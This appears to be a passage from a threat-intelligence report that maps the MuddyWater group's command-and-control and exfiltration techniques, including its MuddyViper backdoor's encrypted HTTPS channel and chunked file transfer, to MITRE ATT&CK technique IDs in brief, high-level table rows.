Command and Control | T1573.001 | Encrypted Channel: Symmetric Cryptography | MuddyViper uses AES-CBC encryption to encrypt data before exchanging it with the C&C server.
Command and Control | T1219 | Remote Access Software | MuddyWater uses the Atera, Level, and PDQ RMM tools for remote access to victims' systems.
Command and Control | T1071.001 | Application Layer Protocol: Web Protocols | MuddyViper uses HTTPS for C&C communications. The reverse tunnels use a mixture of HTTP and HTTPS for C&C communications.
Command and Control | T1105 | Ingress Tool Transfer | MuddyViper has the capability to download additional payloads from its C&C server.
Command and Control | T1001 | Data Obfuscation | MuddyViper leverages HTTPS for C&C communications, using the Status header to hide a backdoor command ID in the server-to-client direction of the communication.
Command and Control | T1090 | Proxy | MuddyWater uses customized versions of go‑socks5 reverse proxy tools.
Exfiltration | T1041 | Exfiltration Over C2 Channel | MuddyWater tools exfiltrate data to C&C servers using C&C channels (HTTP and HTTPS).
Exfiltration | T1030 | Data Transfer Size Limits | MuddyViper supports downloading/uploading files in chunks of limited size.
